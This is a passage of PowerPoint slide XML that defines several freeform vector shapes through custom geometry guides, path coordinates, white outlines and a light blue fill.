                    <a:lnTo>
                      <a:pt x="80" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="91"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36300" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4791" y="2376"/>
                <a:ext cx="40" cy="53"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 40"/>
                  <a:gd name="T1" fmla="*/ 53 h 53"/>
                  <a:gd name="T2" fmla="*/ 20 w 40"/>
                  <a:gd name="T3" fmla="*/ 52 h 53"/>
                  <a:gd name="T4" fmla="*/ 20 w 40"/>
                  <a:gd name="T5" fmla="*/ 51 h 53"/>
                  <a:gd name="T6" fmla="*/ 22 w 40"/>
                  <a:gd name="T7" fmla="*/ 47 h 53"/>
                  <a:gd name="T8" fmla="*/ 22 w 40"/>
                  <a:gd name="T9" fmla="*/ 42 h 53"/>
                  <a:gd name="T10" fmla="*/ 20 w 40"/>
                  <a:gd name="T11" fmla="*/ 41 h 53"/>
                  <a:gd name="T12" fmla="*/ 18 w 40"/>
                  <a:gd name="T13" fmla="*/ 43 h 53"/>
                  <a:gd name="T14" fmla="*/ 17 w 40"/>
                  <a:gd name="T15" fmla="*/ 47 h 53"/>
                  <a:gd name="T16" fmla="*/ 15 w 40"/>
                  <a:gd name="T17" fmla="*/ 50 h 53"/>
                  <a:gd name="T18" fmla="*/ 12 w 40"/>
                  <a:gd name="T19" fmla="*/ 49 h 53"/>
                  <a:gd name="T20" fmla="*/ 12 w 40"/>
                  <a:gd name="T21" fmla="*/ 47 h 53"/>
                  <a:gd name="T22" fmla="*/ 14 w 40"/>
                  <a:gd name="T23" fmla="*/ 43 h 53"/>
                  <a:gd name="T24" fmla="*/ 14 w 40"/>
                  <a:gd name="T25" fmla="*/ 40 h 53"/>
                  <a:gd name="T26" fmla="*/ 12 w 40"/>
                  <a:gd name="T27" fmla="*/ 33 h 53"/>
                  <a:gd name="T28" fmla="*/ 13 w 40"/>
                  <a:gd name="T29" fmla="*/ 32 h 53"/>
                  <a:gd name="T30" fmla="*/ 18 w 40"/>
                  <a:gd name="T31" fmla="*/ 27 h 53"/>
                  <a:gd name="T32" fmla="*/ 18 w 40"/>
                  <a:gd name="T33" fmla="*/ 26 h 53"/>
                  <a:gd name="T34" fmla="*/ 19 w 40"/>
                  <a:gd name="T35" fmla="*/ 22 h 53"/>
                  <a:gd name="T36" fmla="*/ 15 w 40"/>
                  <a:gd name="T37" fmla="*/ 15 h 53"/>
                  <a:gd name="T38" fmla="*/ 13 w 40"/>
                  <a:gd name="T39" fmla="*/ 15 h 53"/>
                  <a:gd name="T40" fmla="*/ 11 w 40"/>
                  <a:gd name="T41" fmla="*/ 17 h 53"/>
                  <a:gd name="T42" fmla="*/ 8 w 40"/>
                  <a:gd name="T43" fmla="*/ 21 h 53"/>
                  <a:gd name="T44" fmla="*/ 7 w 40"/>
                  <a:gd name="T45" fmla="*/ 20 h 53"/>
                  <a:gd name="T46" fmla="*/ 5 w 40"/>
                  <a:gd name="T47" fmla="*/ 16 h 53"/>
                  <a:gd name="T48" fmla="*/ 2 w 40"/>
                  <a:gd name="T49" fmla="*/ 14 h 53"/>
                  <a:gd name="T50" fmla="*/ 0 w 40"/>
                  <a:gd name="T51" fmla="*/ 11 h 53"/>
                  <a:gd name="T52" fmla="*/ 3 w 40"/>
                  <a:gd name="T53" fmla="*/ 8 h 53"/>
                  <a:gd name="T54" fmla="*/ 9 w 40"/>
                  <a:gd name="T55" fmla="*/ 8 h 53"/>
                  <a:gd name="T56" fmla="*/ 14 w 40"/>
                  <a:gd name="T57" fmla="*/ 7 h 53"/>
                  <a:gd name="T58" fmla="*/ 16 w 40"/>
                  <a:gd name="T59" fmla="*/ 3 h 53"/>
                  <a:gd name="T60" fmla="*/ 18 w 40"/>
                  <a:gd name="T61" fmla="*/ 1 h 53"/>
                  <a:gd name="T62" fmla="*/ 21 w 40"/>
                  <a:gd name="T63" fmla="*/ 0 h 53"/>
                  <a:gd name="T64" fmla="*/ 24 w 40"/>
                  <a:gd name="T65" fmla="*/ 1 h 53"/>
                  <a:gd name="T66" fmla="*/ 26 w 40"/>
                  <a:gd name="T67" fmla="*/ 4 h 53"/>
                  <a:gd name="T68" fmla="*/ 28 w 40"/>
                  <a:gd name="T69" fmla="*/ 5 h 53"/>
                  <a:gd name="T70" fmla="*/ 31 w 40"/>
                  <a:gd name="T71" fmla="*/ 6 h 53"/>
                  <a:gd name="T72" fmla="*/ 36 w 40"/>
                  <a:gd name="T73" fmla="*/ 4 h 53"/>
                  <a:gd name="T74" fmla="*/ 37 w 40"/>
                  <a:gd name="T75" fmla="*/ 8 h 53"/>
                  <a:gd name="T76" fmla="*/ 33 w 40"/>
                  <a:gd name="T77" fmla="*/ 11 h 53"/>
                  <a:gd name="T78" fmla="*/ 36 w 40"/>
                  <a:gd name="T79" fmla="*/ 13 h 53"/>
                  <a:gd name="T80" fmla="*/ 39 w 40"/>
                  <a:gd name="T81" fmla="*/ 17 h 53"/>
                  <a:gd name="T82" fmla="*/ 40 w 40"/>
                  <a:gd name="T83" fmla="*/ 19 h 53"/>
                  <a:gd name="T84" fmla="*/ 36 w 40"/>
                  <a:gd name="T85" fmla="*/ 24 h 53"/>
                  <a:gd name="T86" fmla="*/ 34 w 40"/>
                  <a:gd name="T87" fmla="*/ 28 h 53"/>
                  <a:gd name="T88" fmla="*/ 33 w 40"/>
                  <a:gd name="T89" fmla="*/ 31 h 53"/>
                  <a:gd name="T90" fmla="*/ 33 w 40"/>
                  <a:gd name="T91" fmla="*/ 36 h 53"/>
                  <a:gd name="T92" fmla="*/ 32 w 40"/>
                  <a:gd name="T93" fmla="*/ 41 h 53"/>
                  <a:gd name="T94" fmla="*/ 30 w 40"/>
                  <a:gd name="T95" fmla="*/ 44 h 53"/>
                  <a:gd name="T96" fmla="*/ 29 w 40"/>
                  <a:gd name="T97" fmla="*/ 45 h 53"/>
                  <a:gd name="T98" fmla="*/ 27 w 40"/>
                  <a:gd name="T99" fmla="*/ 46 h 53"/>
                  <a:gd name="T100" fmla="*/ 26 w 40"/>
                  <a:gd name="T101" fmla="*/ 47 h 53"/>
                  <a:gd name="T102" fmla="*/ 23 w 40"/>
                  <a:gd name="T103" fmla="*/ 53 h 53"/>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40"/>
                  <a:gd name="T157" fmla="*/ 0 h 53"/>
                  <a:gd name="T158" fmla="*/ 40 w 40"/>
                  <a:gd name="T159" fmla="*/ 53 h 53"/>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40" h="53">
                    <a:moveTo>
                      <a:pt x="23" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="53"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36301" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4835" y="2367"/>
                <a:ext cx="40" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 40"/>
                  <a:gd name="T1" fmla="*/ 31 h 31"/>
                  <a:gd name="T2" fmla="*/ 8 w 40"/>
                  <a:gd name="T3" fmla="*/ 29 h 31"/>
                  <a:gd name="T4" fmla="*/ 6 w 40"/>
                  <a:gd name="T5" fmla="*/ 27 h 31"/>
                  <a:gd name="T6" fmla="*/ 5 w 40"/>
                  <a:gd name="T7" fmla="*/ 24 h 31"/>
                  <a:gd name="T8" fmla="*/ 4 w 40"/>
                  <a:gd name="T9" fmla="*/ 20 h 31"/>
                  <a:gd name="T10" fmla="*/ 0 w 40"/>
                  <a:gd name="T11" fmla="*/ 16 h 31"/>
                  <a:gd name="T12" fmla="*/ 6 w 40"/>
                  <a:gd name="T13" fmla="*/ 13 h 31"/>
                  <a:gd name="T14" fmla="*/ 8 w 40"/>
                  <a:gd name="T15" fmla="*/ 10 h 31"/>
                  <a:gd name="T16" fmla="*/ 11 w 40"/>
                  <a:gd name="T17" fmla="*/ 5 h 31"/>
                  <a:gd name="T18" fmla="*/ 14 w 40"/>
                  <a:gd name="T19" fmla="*/ 7 h 31"/>
                  <a:gd name="T20" fmla="*/ 18 w 40"/>
                  <a:gd name="T21" fmla="*/ 7 h 31"/>
                  <a:gd name="T22" fmla="*/ 22 w 40"/>
                  <a:gd name="T23" fmla="*/ 6 h 31"/>
                  <a:gd name="T24" fmla="*/ 24 w 40"/>
                  <a:gd name="T25" fmla="*/ 3 h 31"/>
                  <a:gd name="T26" fmla="*/ 27 w 40"/>
                  <a:gd name="T27" fmla="*/ 0 h 31"/>
                  <a:gd name="T28" fmla="*/ 30 w 40"/>
                  <a:gd name="T29" fmla="*/ 0 h 31"/>
                  <a:gd name="T30" fmla="*/ 33 w 40"/>
                  <a:gd name="T31" fmla="*/ 1 h 31"/>
                  <a:gd name="T32" fmla="*/ 39 w 40"/>
                  <a:gd name="T33" fmla="*/ 3 h 31"/>
                  <a:gd name="T34" fmla="*/ 40 w 40"/>
                  <a:gd name="T35" fmla="*/ 5 h 31"/>
                  <a:gd name="T36" fmla="*/ 39 w 40"/>
                  <a:gd name="T37" fmla="*/ 6 h 31"/>
                  <a:gd name="T38" fmla="*/ 38 w 40"/>
                  <a:gd name="T39" fmla="*/ 10 h 31"/>
                  <a:gd name="T40" fmla="*/ 36 w 40"/>
                  <a:gd name="T41" fmla="*/ 12 h 31"/>
                  <a:gd name="T42" fmla="*/ 30 w 40"/>
                  <a:gd name="T43" fmla="*/ 20 h 31"/>
                  <a:gd name="T44" fmla="*/ 29 w 40"/>
                  <a:gd name="T45" fmla="*/ 18 h 31"/>
                  <a:gd name="T46" fmla="*/ 26 w 40"/>
                  <a:gd name="T47" fmla="*/ 15 h 31"/>
                  <a:gd name="T48" fmla="*/ 23 w 40"/>
                  <a:gd name="T49" fmla="*/ 15 h 31"/>
                  <a:gd name="T50" fmla="*/ 18 w 40"/>
                  <a:gd name="T51" fmla="*/ 17 h 31"/>
                  <a:gd name="T52" fmla="*/ 17 w 40"/>
                  <a:gd name="T53" fmla="*/ 18 h 31"/>
                  <a:gd name="T54" fmla="*/ 15 w 40"/>
                  <a:gd name="T55" fmla="*/ 23 h 31"/>
                  <a:gd name="T56" fmla="*/ 14 w 40"/>
                  <a:gd name="T57" fmla="*/ 27 h 31"/>
                  <a:gd name="T58" fmla="*/ 13 w 40"/>
                  <a:gd name="T59" fmla="*/ 29 h 31"/>
                  <a:gd name="T60" fmla="*/ 10 w 40"/>
                  <a:gd name="T61" fmla="*/ 31 h 31"/>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40"/>
                  <a:gd name="T94" fmla="*/ 0 h 31"/>
                  <a:gd name="T95" fmla="*/ 40 w 40"/>
                  <a:gd name="T96" fmla="*/ 31 h 31"/>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40" h="31">
                    <a:moveTo>
                      <a:pt x="10" y="31"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36302" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4508" y="2847"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 17"/>
                  <a:gd name="T1" fmla="*/ 9 h 17"/>
                  <a:gd name="T2" fmla="*/ 1 w 17"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 6 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 10 w 17"/>
                  <a:gd name="T7" fmla="*/ 1 h 17"/>
                  <a:gd name="T8" fmla="*/ 12 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 11 w 17"/>
                  <a:gd name="T11" fmla="*/ 2 h 17"/>
                  <a:gd name="T12" fmla="*/ 12 w 17"/>
                  <a:gd name="T13" fmla="*/ 3 h 17"/>
                  <a:gd name="T14" fmla="*/ 14 w 17"/>
                  <a:gd name="T15" fmla="*/ 3 h 17"/>
                  <a:gd name="T16" fmla="*/ 14 w 17"/>
                  <a:gd name="T17" fmla="*/ 4 h 17"/>
                  <a:gd name="T18" fmla="*/ 15 w 17"/>
                  <a:gd name="T19" fmla="*/ 7 h 17"/>
                  <a:gd name="T20" fmla="*/ 15 w 17"/>
                  <a:gd name="T21" fmla="*/ 8 h 17"/>
                  <a:gd name="T22" fmla="*/ 15 w 17"/>
                  <a:gd name="T23" fmla="*/ 10 h 17"/>
                  <a:gd name="T24" fmla="*/ 17 w 17"/>
                  <a:gd name="T25" fmla="*/ 11 h 17"/>
                  <a:gd name="T26" fmla="*/ 17 w 17"/>
                  <a:gd name="T27" fmla="*/ 12 h 17"/>
                  <a:gd name="T28" fmla="*/ 8 w 17"/>
                  <a:gd name="T29" fmla="*/ 15 h 17"/>
                  <a:gd name="T30" fmla="*/ 5 w 17"/>
                  <a:gd name="T31" fmla="*/ 17 h 17"/>
                  <a:gd name="T32" fmla="*/ 3 w 17"/>
                  <a:gd name="T33" fmla="*/ 15 h 17"/>
                  <a:gd name="T34" fmla="*/ 2 w 17"/>
                  <a:gd name="T35" fmla="*/ 13 h 17"/>
                  <a:gd name="T36" fmla="*/ 1 w 17"/>
                  <a:gd name="T37" fmla="*/ 13 h 17"/>
                  <a:gd name="T38" fmla="*/ 0 w 17"/>
                  <a:gd name="T39" fmla="*/ 10 h 17"/>
                  <a:gd name="T40" fmla="*/ 0 w 17"/>
                  <a:gd name="T41" fmla="*/ 9 h 1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7"/>
                  <a:gd name="T64" fmla="*/ 0 h 17"/>
                  <a:gd name="T65" fmla="*/ 17 w 17"/>
                  <a:gd name="T66" fmla="*/ 17 h 17"/>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7" h="17">
                    <a:moveTo>
                      <a:pt x="0" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36303" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4508" y="2847"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 17"/>
                  <a:gd name="T1" fmla="*/ 9 h 17"/>
                  <a:gd name="T2" fmla="*/ 1 w 17"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 6 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 10 w 17"/>
                  <a:gd name="T7" fmla="*/ 1 h 17"/>
                  <a:gd name="T8" fmla="*/ 12 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 11 w 17"/>
                  <a:gd name="T11" fmla="*/ 2 h 17"/>
                  <a:gd name="T12" fmla="*/ 12 w 17"/>
                  <a:gd name="T13" fmla="*/ 3 h 17"/>
                  <a:gd name="T14" fmla="*/ 14 w 17"/>
                  <a:gd name="T15" fmla="*/ 3 h 17"/>
                  <a:gd name="T16" fmla="*/ 14 w 17"/>
                  <a:gd name="T17" fmla="*/ 4 h 17"/>
                  <a:gd name="T18" fmla="*/ 15 w 17"/>
                  <a:gd name="T19" fmla="*/ 7 h 17"/>
                  <a:gd name="T20" fmla="*/ 15 w 17"/>
                  <a:gd name="T21" fmla="*/ 8 h 17"/>
                  <a:gd name="T22" fmla="*/ 15 w 17"/>
                  <a:gd name="T23" fmla="*/ 10 h 17"/>
                  <a:gd name="T24" fmla="*/ 17 w 17"/>
                  <a:gd name="T25" fmla="*/ 11 h 17"/>
                  <a:gd name="T26" fmla="*/ 17 w 17"/>
                  <a:gd name="T27" fmla="*/ 12 h 17"/>
                  <a:gd name="T28" fmla="*/ 8 w 17"/>
                  <a:gd name="T29" fmla="*/ 15 h 17"/>
                  <a:gd name="T30" fmla="*/ 5 w 17"/>
                  <a:gd name="T31" fmla="*/ 17 h 17"/>
                  <a:gd name="T32" fmla="*/ 3 w 17"/>
                  <a:gd name="T33" fmla="*/ 15 h 17"/>
                  <a:gd name="T34" fmla="*/ 2 w 17"/>
                  <a:gd name="T35" fmla="*/ 13 h 17"/>
                  <a:gd name="T36" fmla="*/ 1 w 17"/>
                  <a:gd name="T37" fmla="*/ 13 h 17"/>
                  <a:gd name="T38" fmla="*/ 0 w 17"/>
                  <a:gd name="T39" fmla="*/ 10 h 17"/>
                  <a:gd name="T40" fmla="*/ 0 w 17"/>
                  <a:gd name="T41" fmla="*/ 9 h 1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7"/>
                  <a:gd name="T64" fmla="*/ 0 h 17"/>
                  <a:gd name="T65" fmla="*/ 17 w 17"/>
                  <a:gd name="T66" fmla="*/ 17 h 17"/>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7" h="17">
                    <a:moveTo>
                      <a:pt x="0" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
